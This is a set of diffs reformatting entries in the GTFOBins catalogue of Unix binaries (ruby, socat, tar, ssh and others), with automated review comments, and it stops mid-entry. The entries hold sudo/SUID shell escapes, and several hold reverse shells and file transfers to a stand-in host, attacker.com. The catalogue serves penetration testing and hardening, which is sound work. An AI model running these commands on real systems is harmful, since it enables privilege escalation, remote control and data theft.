- - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
+ - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ sudo-enabled:
+ - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 0c36e04..1039257 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -1,32 +1,33 @@
---
functions:
execute-interactive:
- - code: ruby -e 'exec "/bin/sh"'
- sudo-enabled:
- - code: sudo ruby -e 'exec "/bin/sh"'
- upload:
- - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
- code: |
- export LPORT=8888
- ruby -run -e httpd . -p $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export RFILE=/file_to_get
- export LFILE=file_to_save
- ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
+ - code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
- file-read:
- - code: ruby -e 'puts File.read("file_to_read")'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ upload:
+ - description: Serve files in the local folder running an HTTP server. This requires
+ version 1.9.2 or later.
+ code: |
+ export LPORT=8888
+ ruby -run -e httpd . -p $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export RFILE=/file_to_get
+ export LFILE=file_to_save
+ ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
file-write:
- - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ file-read:
+ - code: ruby -e 'puts File.read("file_to_read")'
load-library:
- - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ sudo-enabled:
+ - code: sudo ruby -e 'exec "/bin/sh"'
---
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index 9cc7489..711cf53 100644
--- a/_gtfobins/scp.md
+++ b/_gtfobins/scp.md
@@ -1,36 +1,36 @@
---
functions:
execute-non-interactive:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- scp -S $TF x y:
- sudo-enabled:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- sudo scp -S $TF x y:
- suid-limited:
- - code: |
- TF=$(mktemp)
- CMD="id"
- echo "$CMD" > "$TF"
- chmod +x "$TF"
- ./scp -S $TF a b:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ scp -S $TF x y:
upload:
- - description: Send local file to a SSH server.
- code: |
- RPATH=user@attacker.com:~/file_to_save
- LPATH=file_to_send
- scp $LFILE $RPATH
+ - description: Send local file to a SSH server.
+ code: |
+ RPATH=user@attacker.com:~/file_to_save
+ LPATH=file_to_send
+ scp $LFILE $RPATH
download:
- - description: Fetch a remote file from a SSH server.
- code: |
- RPATH=user@attacker.com:~/file_to_get
- LFILE=file_to_save
- scp $RPATH $LFILE
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RPATH=user@attacker.com:~/file_to_get
+ LFILE=file_to_save
+ scp $RPATH $LFILE
+ sudo-enabled:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ sudo scp -S $TF x y:
+ suid-limited:
+ - code: |
+ TF=$(mktemp)
+ CMD="id"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ ./scp -S $TF a b:
---
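Review bot: The `upload` entry sets `LPATH=file_to_send` but the command on the next line expands `$LFILE`, which is never assigned, so the stanza as written has an empty source argument; the commit only moves the block and carries the mismatch over. Align the two, e.g. `LFILE=file_to_send` to match the naming in the `download` entry, or `scp $LPATH $RPATH`.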
diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md
index fca942b..0cd0df4 100644
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
@@ -1,24 +1,24 @@
---
functions:
execute-interactive:
- - description: GNU version only. Also, this requires `bash`.
- code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
+ - description: GNU version only. Also, this requires `bash`.
+ code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
execute-non-interactive:
- - description: GNU version only.
- code: sed -n "1e id" /etc/hosts
- sudo-enabled:
- - description: GNU version only. Also, this requires `bash`.
- code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sed -e '' "$LFILE"
- file-read:
- - code: |
- LFILE=file_to_read
- sed '' "$LFILE"
+ - description: GNU version only.
+ code: sed -n "1e id" /etc/hosts
file-write:
- - code: |
- LFILE=file_to_write
- sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ - code: |
+ LFILE=file_to_write
+ sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ sed '' "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sed -e '' "$LFILE"
+ sudo-enabled:
+ - description: GNU version only. Also, this requires `bash`.
+ code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
---
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
index af80824..cdc0aed 100644
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: setarch $(arch) /bin/sh
- sudo-enabled:
- - code: sudo setarch $(arch) /bin/sh
+ - code: setarch $(arch) /bin/sh
suid-enabled:
- - code: ./setarch $(arch) /bin/sh -p
+ - code: "./setarch $(arch) /bin/sh -p"
+ sudo-enabled:
+ - code: sudo setarch $(arch) /bin/sh
---
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index 8c528e8..743b96f 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
@@ -1,25 +1,25 @@
---
functions:
execute-interactive:
- - code: |
- HOST=user@attacker.com
- sftp $HOST
- !/bin/sh
- sudo-enabled:
- - code: |
- HOST=user@attacker.com
- sudo sftp $HOST
- !/bin/sh
+ - code: |
+ HOST=user@attacker.com
+ sftp $HOST
+ !/bin/sh
upload:
- - description: Send local file to a SSH server.
- code: |
- RHOST=user@attacker.com
- sftp $RHOST
- put file_to_send file_to_save
+ - description: Send local file to a SSH server.
+ code: |
+ RHOST=user@attacker.com
+ sftp $RHOST
+ put file_to_send file_to_save
download:
- - description: Fetch a remote file from a SSH server.
- code: |
- RHOST=user@attacker.com
- sftp $RHOST
- get file_to_get file_to_save
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RHOST=user@attacker.com
+ sftp $RHOST
+ get file_to_get file_to_save
+ sudo-enabled:
+ - code: |
+ HOST=user@attacker.com
+ sudo sftp $HOST
+ !/bin/sh
---
diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md
index 318fcd2..924ea0e 100644
--- a/_gtfobins/shuf.md
+++ b/_gtfobins/shuf.md
@@ -1,17 +1,17 @@
---
description: The read file content is corrupted by adding a newline.
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_write
- sudo shuf -e data -o "$LFILE"
- suid-enabled:
- - description:
- code: |
- LFILE=file_to_write
- ./shuf -e data -o "$LFILE"
file-write:
- - code: |
- LFILE=file_to_write
- shuf -e data -o "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ shuf -e data -o "$LFILE"
+ suid-enabled:
+ - description:
+ code: |
+ LFILE=file_to_write
+ ./shuf -e data -o "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ sudo shuf -e data -o "$LFILE"
---
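Review bot: The `suid-enabled` entry keeps a bare `description:` with no value, which YAML loads as `null` rather than an empty string, so the renderer receives a key that is present but empty; remove the line or give it text. The page-level `description` also says "The read file content is corrupted", yet the only function in this file is `file-write`, so the wording looks inconsistent — presumably it should speak of the written file, but confirm what `shuf -e data -o` actually produces before rewording.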
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 2e84b46..dc524ff 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -1,14 +1,16 @@
---
functions:
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on
+ the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive:
- - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
+ - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
+ on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
---
diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md
index 528d912..42f8b2c 100644
--- a/_gtfobins/sort.md
+++ b/_gtfobins/sort.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo sort -m "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sort -m "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- sort -m "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ sort -m "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sort -m "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo sort -m "$LFILE"
---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index f9ad23f..5b4f1f2 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -1,21 +1,21 @@
---
functions:
execute-interactive:
- - code: sqlite3 /dev/null '.shell /bin/sh'
- sudo-enabled:
- - code: sudo sqlite3 /dev/null '.shell /bin/sh'
- suid-limited:
- - code: ./sqlite3 /dev/null '.shell /bin/sh'
+ - code: sqlite3 /dev/null '.shell /bin/sh'
file-write:
- - code: |
- LFILE=file_to_write
- sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
+ - code: |
+ LFILE=file_to_write
+ sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
file-read:
- - code: |
- LFILE=file_to_read
- sqlite3 << EOF
- CREATE TABLE t(line TEXT);
- .import $LFILE t
- SELECT * FROM t;
- EOF
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ sudo-enabled:
+ - code: sudo sqlite3 /dev/null '.shell /bin/sh'
+ suid-limited:
+ - code: "./sqlite3 /dev/null '.shell /bin/sh'"
---
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 71c5e10..bd3a290 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -1,30 +1,32 @@
---
functions:
execute-interactive:
- - description: Reconnecting may help bypassing restricted shells.
- code: ssh localhost $SHELL --noprofile --norc
- - description: Spawn interactive shell through ProxyCommand option.
- code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
- sudo-enabled:
- - description: Spawn interactive root shell through ProxyCommand option.
- code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
- download:
- - description: Fetch a remote file from a SSH server.
- code: |
- HOST=user@attacker.com
- RPATH=file_to_get
- LPATH=file_to_save
- ssh $HOST "cat $RPATH" > $LPATH
+ - description: Reconnecting may help bypassing restricted shells.
+ code: ssh localhost $SHELL --noprofile --norc
+ - description: Spawn interactive shell through ProxyCommand option.
+ code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'"
+ x
upload:
- - description: Send local file to a SSH server.
- code: |
- HOST=user@attacker.com
- RPATH=file_to_save
- LPATH=file_to_send
- ssh $HOST "cat > $RPATH" < $LPATH
+ - description: Send local file to a SSH server.
+ code: |
+ HOST=user@attacker.com
+ RPATH=file_to_save
+ LPATH=file_to_send
+ ssh $HOST "cat > $RPATH" < $LPATH
+ download:
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ HOST=user@attacker.com
+ RPATH=file_to_get
+ LPATH=file_to_save
+ ssh $HOST "cat $RPATH" > $LPATH
file-read:
- - description: The read file content is corrupted by error prints.
- code: |
- LFILE=file_to_read
- ssh -F $LFILE localhost
+ - description: The read file content is corrupted by error prints.
+ code: |
+ LFILE=file_to_read
+ ssh -F $LFILE localhost
+ sudo-enabled:
+ - description: Spawn interactive root shell through ProxyCommand option.
+ code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh
+ -i'" x
---
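Review bot: The two ProxyCommand one-liners (the execute-interactive entry and the sudo-enabled entry) are now plain multi-line scalars, broken mid-command by the dumper's line-width wrap, with the trailing `x` and `-i'" x` pushed onto continuation lines. YAML folds that line break into a single space, so the values still parse as the original commands, but a plain scalar split this way is fragile: a later edit that leaves a continuation line starting with `- `, `#` or `: ` silently changes or breaks the value, and a reader copying the command from the source file gets two lines. Keep each command on one line, or write it as a folded block scalar, e.g. `code: >-` followed by the indented command, matching the `|` blocks the other multi-line entries in this file already use; alternatively re-run the dumper with a larger width so shell commands are never wrapped.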
diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md
index 222d68b..c0e4181 100644
--- a/_gtfobins/stdbuf.md
+++ b/_gtfobins/stdbuf.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: stdbuf -i0 /bin/sh
- sudo-enabled:
- - code: sudo stdbuf -i0 /bin/sh
+ - code: stdbuf -i0 /bin/sh
suid-enabled:
- - code: ./stdbuf -i0 /bin/sh -p
+ - code: "./stdbuf -i0 /bin/sh -p"
+ sudo-enabled:
+ - code: sudo stdbuf -i0 /bin/sh
---
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 61374f4..2302f19 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: strace -o /dev/null /bin/sh
- sudo-enabled:
- - code: sudo strace -o /dev/null /bin/sh
+ - code: strace -o /dev/null /bin/sh
suid-enabled:
- - code: ./strace -o /dev/null /bin/sh -p
+ - code: "./strace -o /dev/null /bin/sh -p"
+ sudo-enabled:
+ - code: sudo strace -o /dev/null /bin/sh
---
diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md
index 73d0c97..f7090f1 100644
--- a/_gtfobins/tail.md
+++ b/_gtfobins/tail.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo tail -c1G "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./tail -c1G "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- tail -c1G "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ tail -c1G "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./tail -c1G "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo tail -c1G "$LFILE"
---
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index 19fd34d..01afeef 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -1,24 +1,24 @@
---
functions:
execute-interactive:
- - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
- - description: This only works for GNU tar.
- code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
- sudo-enabled:
- - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
- suid-limited:
- - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ - description: This only works for GNU tar.
+ code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write:
- - description: This only works for GNU tar.
- code: |
- LFILE=file_to_write
- TF=$(mktemp)
- echo data > "$TF"
- tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
+ - description: This only works for GNU tar.
+ code: |
+ LFILE=file_to_write
+ TF=$(mktemp)
+ echo data > "$TF"
+ tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
file-read:
- - description: This only works for GNU tar.
- code: |
- LFILE=file_to_read
- tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
+ - description: This only works for GNU tar.
+ code: |
+ LFILE=file_to_read
+ tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
+ sudo-enabled:
+ - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ suid-limited:
+ - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
---
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 78630bb..7c90197 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: taskset 1 /bin/sh
- sudo-enabled:
- - code: sudo taskset 1 /bin/sh
+ - code: taskset 1 /bin/sh
suid-enabled:
- - code: ./taskset 1 /bin/sh -p
+ - code: "./taskset 1 /bin/sh -p"
+ sudo-enabled:
+ - code: sudo taskset 1 /bin/sh
---
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index f233314..582cd12 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -1,21 +1,21 @@
---
functions:
execute-interactive:
- - code: |
- tclsh
- exec /bin/sh <@stdin >@stdout 2>@stderr
- sudo-enabled:
- - code: |
- sudo tclsh
- exec /bin/sh <@stdin >@stdout 2>@stderr
- suid-enabled:
- - code: |
- ./tclsh
- exec /bin/sh -p <@stdin >@stdout 2>@stderr
+ - code: |
+ tclsh
+ exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
+ suid-enabled:
+ - code: |
+ ./tclsh
+ exec /bin/sh -p <@stdin >@stdout 2>@stderr
+ sudo-enabled:
+ - code: |
+ sudo tclsh
+ exec /bin/sh <@stdin >@stdout 2>@stderr
---
diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md
index 51b3558..a10c8c7 100644
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@@ -1,17 +1,18 @@
---
-description: |
- It can only append data if the destination exists.
+description: 'It can only append data if the destination exists.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_write
- echo data | sudo tee -a "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
file-write:
- - code: |
- LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ echo data | ./tee -a "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo data | ./tee -a "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_write
+ echo data | sudo tee -a "$LFILE"
---
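Review bot: The unprivileged `file-write` entry still invokes `./tee -a "$LFILE"`, a relative path that only resolves when the current directory happens to contain a `tee` binary; the sibling files in this change (sort, tail, xxd, uniq) use the bare name for the unprivileged case and reserve `./` for `suid-enabled`, so this looks like a copy of the SUID entry. Change it to `echo data | tee -a "$LFILE"`. Separately, the description was re-serialized as a single-quoted scalar with an embedded blank line (`'It can only append data if the destination exists.` + blank line + `'`) to preserve the trailing newline of the original `|` block; it parses to the same string, but `description: |` is clearer and matches the rest of the corpus.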
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index 80946c8..e237c64 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -1,36 +1,35 @@
---
functions:
execute-interactive:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- telnet $RHOST $RPORT
- ^]
- !/bin/sh
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- TF=$(mktemp)
- rm $TF
- mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ TF=$(mktemp)
+ rm $TF
+ mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- sudo telnet $RHOST $RPORT
- ^]
- !/bin/sh
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ sudo telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
suid-limited:
- - description: BSD version only. Needs to be connected first.
- code: |
- RHOST=attacker.com
- RPORT=12345
- ./telnet $RHOST $RPORT
- ^]
- !/bin/sh
-
+ - description: BSD version only. Needs to be connected first.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ ./telnet $RHOST $RPORT
+ ^]
+ !/bin/sh
---
diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md
index f391860..173edd6 100644
--- a/_gtfobins/tftp.md
+++ b/_gtfobins/tftp.md
@@ -1,15 +1,15 @@
---
functions:
upload:
- - description: Send local file to a TFTP server.
- code: |
- RHOST=attacker.com
- tftp $RHOST
- put file_to_send
+ - description: Send local file to a TFTP server.
+ code: |
+ RHOST=attacker.com
+ tftp $RHOST
+ put file_to_send
download:
- - description: Fetch a remote file from a TFTP server.
- code: |
- RHOST=attacker.com
- tftp $RHOST
- get file_to_get
+ - description: Fetch a remote file from a TFTP server.
+ code: |
+ RHOST=attacker.com
+ tftp $RHOST
+ get file_to_get
---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
index 91c6290..97c4be1 100644
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@@ -4,9 +4,9 @@ description: |
behave differently than` /usr/bin/time`, hence the absolute path.
functions:
execute-interactive:
- - code: /usr/bin/time /bin/sh
- sudo-enabled:
- - code: sudo /usr/bin/time /bin/sh
+ - code: "/usr/bin/time /bin/sh"
suid-enabled:
- - code: ./time /bin/sh -p
+ - code: "./time /bin/sh -p"
+ sudo-enabled:
+ - code: sudo /usr/bin/time /bin/sh
---
diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md
index fa50e90..6a4742a 100644
--- a/_gtfobins/timeout.md
+++ b/_gtfobins/timeout.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: timeout 7d /bin/sh
- sudo-enabled:
- - code: sudo timeout --foreground 7d /bin/sh
+ - code: timeout 7d /bin/sh
suid-enabled:
- - code: ./timeout 7d /bin/sh -p
+ - code: "./timeout 7d /bin/sh -p"
+ sudo-enabled:
+ - code: sudo timeout --foreground 7d /bin/sh
---
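Review bot: The `sudo-enabled` entry passes `--foreground` while the `execute-interactive` and `suid-enabled` entries do not, and the commit reorders the keys without reconciling the three. GNU timeout documents `--foreground` as the option to use when the command is run from an interactive shell so the child can read the TTY and receive signals; presumably the unprivileged and SUID variants need it for the same reason, in which case `timeout --foreground 7d /bin/sh` and `./timeout --foreground 7d /bin/sh -p` would make the entries consistent. Verify on a GNU coreutils host before changing, since the behaviour without the flag is not shown here.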
diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md
index 014d734..6da459d 100644
--- a/_gtfobins/ul.md
+++ b/_gtfobins/ul.md
@@ -3,16 +3,16 @@ description: |
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo ul "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./ul "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- ul "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ ul "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./ul "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo ul "$LFILE"
---
diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md
index 886d27f..601ea73 100644
--- a/_gtfobins/unexpand.md
+++ b/_gtfobins/unexpand.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo unexpand -t99999999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./unexpand -t99999999 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- unexpand -t99999999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ unexpand -t99999999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./unexpand -t99999999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo unexpand -t99999999 "$LFILE"
---
diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md
index b8b09f8..d2208d6 100644
--- a/_gtfobins/uniq.md
+++ b/_gtfobins/uniq.md
@@ -1,17 +1,18 @@
---
-description: |
- The read file content is corrupted by squashing multiple adjacent lines.
+description: 'The read file content is corrupted by squashing multiple adjacent lines.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo uniq "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./uniq "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- uniq "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ uniq "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./uniq "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo uniq "$LFILE"
---
diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md
index 412774b..222cac2 100644
--- a/_gtfobins/unshare.md
+++ b/_gtfobins/unshare.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: unshare /bin/sh
- sudo-enabled:
- - code: sudo unshare /bin/sh
+ - code: unshare /bin/sh
suid-enabled:
- - code: ./unshare -r /bin/sh
+ - code: "./unshare -r /bin/sh"
+ sudo-enabled:
+ - code: sudo unshare /bin/sh
---
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index 43ff1da..a6849d1 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -1,20 +1,21 @@
---
functions:
execute-interactive:
- - code: vi -c ':!/bin/sh'
- - code: |
- vi
- :set shell=/bin/sh
- :shell
- sudo-enabled:
- - code: sudo vi -c ':!/bin/sh'
- suid-enabled:
- - code: ./vi -c ':!/bin/sh -p'
- file-read:
- - code: |
- vi file_to_read
+ - code: vi -c ':!/bin/sh'
+ - code: |
+ vi
+ :set shell=/bin/sh
+ :shell
file-write:
- - code: |
- vi file_to_write
- w
+ - code: |
+ vi file_to_write
+ w
+ file-read:
